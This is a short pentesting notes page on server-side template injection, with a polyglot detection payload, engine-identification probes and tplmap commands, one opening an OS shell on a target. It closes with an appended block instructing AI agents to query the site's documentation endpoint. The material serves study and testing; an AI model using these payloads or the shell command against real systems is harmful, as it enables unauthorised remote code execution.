# SSTI

### What is SSTI?

#### Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server-side. This vulnerability occurs when invalid user input is embedded into the template engine which can generally lead to remote code execution (RCE).

Some of the most popular template engines can be listed as the followings:

* PHP – Smarty, Twigs
* Java – Velocity, Freemaker
* Python – JINJA, Mako, Tornado
* JavaScript – Jade, Rage
* Ruby – Liquid

### How Does It Work?

For the sake of simplicity, imagine you're testing the parameter of the following request:

```html
POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com
parameter=value
```

To detect the vulnerability, use the polyglot payload as the value of the parameter which is a sequence of special characters such as the following:

```
POST /some-endpoint HTTP/1.1
Host: vulnerable-website.com
parameter=${{<%[%'"}}%\.
```

To identify the template engine, read the error message:

![](/files/igSx8kuYS3mSbXIYujbM)

If the error message is not displaying the template engine, we can test via known syntaxes for the popular template engines:

```
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
```

## Exploit

### Tools

### [Tplmap](https://github.com/epinna/tplmap)

```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```

Links :&#x20;

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md>" %}

{% embed url="<https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti>" %}

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://p1yushsecurity.gitbook.io/offsec/exploitation/web-site-exploitation-vectors/ssti.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.